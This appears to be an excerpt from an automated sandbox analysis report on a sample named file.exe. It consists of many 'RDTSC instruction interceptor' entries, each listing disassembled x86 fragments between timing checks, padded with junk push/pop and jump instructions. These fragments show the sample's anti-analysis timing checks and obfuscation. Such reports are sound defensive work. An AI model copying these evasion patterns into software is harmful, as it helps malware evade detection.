Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18AC7 second address: B18ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18ACB second address: B18AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18AD1 second address: B18B3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jns 00007F0AD95F882Ch 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jng 00007F0AD95F8826h 0x00000019 popad 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F0AD95F8828h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 jg 00007F0AD95F882Ch 0x0000003c mov dword ptr [ebp+122D1B38h], ecx 0x00000042 lea eax, dword ptr [ebp+1247D54Ch] 0x00000048 mov edi, 5DFB78C1h 0x0000004d nop 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007F0AD95F8826h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18B3D second address: B18B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18B53 second address: B18B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18B5A second address: B18BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0AD8C6A9B8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov di, EE3Dh 0x00000027 or dword ptr [ebp+122D37E6h], esi 0x0000002d lea eax, dword ptr [ebp+1247D508h] 0x00000033 jbe 00007F0AD8C6A9B9h 0x00000039 mov cx, bx 0x0000003c mov edx, 3BB5A890h 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 push edi 0x00000045 jmp 00007F0AD8C6A9C4h 0x0000004a pop edi 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18BBA second address: B18BBF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B551E6 second address: B551EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B55866 second address: B5587C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Dh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A091 second address: B5A0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0AD8C6A9B6h 0x0000000a pop ecx 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F0AD8C6A9B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A0AB second address: B5A0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A0AF second address: B5A0B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A7DB second address: B5A7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5AC6F second address: B5AC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5ADCD second address: B5ADD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5B092 second address: B5B0A6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0AD8C6A9B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0AD8C6A9B6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B60474 second address: B60478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5FFFA second address: B6000F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F0AD8C6A9BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6000F second address: B60014 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B654A5 second address: B654A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B654A9 second address: B654BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 js 00007F0AD95F8826h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B654BF second address: B654C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B65648 second address: B65652 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B65652 second address: B65658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B65658 second address: B6565C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6565C second address: B65667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B657CF second address: B657D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B69F02 second address: B69F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B69F06 second address: B69F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8835h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6A251 second address: B6A25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6A6AF second address: B6A6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6A6B3 second address: B6A6BD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6A6BD second address: B6A6E3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F882Ch 0x00000008 push ebx 0x00000009 ja 00007F0AD95F8826h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0AD95F882Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6A9BE second address: B6A9DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F0AD8C6A9B6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0AD8C6A9C0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E554 second address: B6E56E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0AD95F882Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DDDC second address: B6DE00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0AD8C6A9B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0AD8C6A9C3h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E242 second address: B6E254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0AD95F882Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73851 second address: B73883 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0AD8C6A9C0h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0AD8C6A9C6h 0x00000010 ja 00007F0AD8C6A9B6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B739D1 second address: B739D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73C83 second address: B73CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C1h 0x00000007 jns 00007F0AD8C6A9B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0AD8C6A9C5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73CB6 second address: B73CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73CC5 second address: B73CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B745A5 second address: B745AF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD95F8832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B745AF second address: B745B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B74B96 second address: B74B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B74B9B second address: B74BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0AD8C6A9C2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B74BB4 second address: B74BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F0AD95F8832h 0x0000000b jns 00007F0AD95F8826h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B753EA second address: B75406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD8C6A9C0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75406 second address: B7540D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7540D second address: B75456 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0AD8C6A9C9h 0x00000008 push ebx 0x00000009 jmp 00007F0AD8C6A9C8h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F0AD8C6A9D2h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0AD8C6A9BAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75456 second address: B75460 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B791B7 second address: B791BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B79A6A second address: B79A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B79D20 second address: B79D51 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F0AD8C6A9C2h 0x00000010 jmp 00007F0AD8C6A9BEh 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84793 second address: B847AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD95F8833h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84A9B second address: B84AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F0AD8C6A9BAh 0x0000000b je 00007F0AD8C6A9BCh 0x00000011 js 00007F0AD8C6A9B6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0AD8C6A9BFh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84AC8 second address: B84AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0AD95F8826h 0x00000009 jne 00007F0AD95F8826h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85459 second address: B8545E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8545E second address: B85479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0AD95F8836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85479 second address: B8548D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F0AD8C6A9B8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8548D second address: B854CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0AD95F882Ah 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F0AD95F8837h 0x00000012 jmp 00007F0AD95F8834h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B854CB second address: B854D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85BDF second address: B85BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85BE3 second address: B85BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85BE9 second address: B85BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85BEF second address: B85BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85BF3 second address: B85C2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0AD95F8834h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0AD95F8830h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85C2E second address: B85C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8AB59 second address: B8AB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0AD95F8833h 0x0000000c jp 00007F0AD95F8826h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E9D3 second address: B8EA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0AD8C6A9C9h 0x00000008 jns 00007F0AD8C6A9B6h 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0AD8C6A9BAh 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE292C second address: AE2932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE2932 second address: AE2937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE2937 second address: AE296B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0AD95F8832h 0x00000008 jmp 00007F0AD95F8839h 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E3DE second address: B8E3F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9BFh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E3F4 second address: B8E403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F0AD95F8826h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E403 second address: B8E444 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F0AD8C6A9C9h 0x00000018 jmp 00007F0AD8C6A9C4h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E444 second address: B8E44A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E44A second address: B8E44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9238B second address: B923A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jp 00007F0AD95F8826h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C830 second address: B9C834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C834 second address: B9C858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0AD95F882Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C858 second address: B9C85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C3DF second address: B9C3E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C3E5 second address: B9C3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C3EB second address: B9C3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9FE85 second address: B9FE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9FE90 second address: B9FEC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0AD95F8834h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9F9F7 second address: B9F9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB1525 second address: BB152B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB398E second address: BB3992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB3992 second address: BB3998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8874 second address: BB8892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F0AD8C6A9B6h 0x00000009 jmp 00007F0AD8C6A9C1h 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8892 second address: BB8898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB89CE second address: BB89D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8CAD second address: BB8CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD95F8826h 0x0000000a jmp 00007F0AD95F8835h 0x0000000f jmp 00007F0AD95F882Bh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
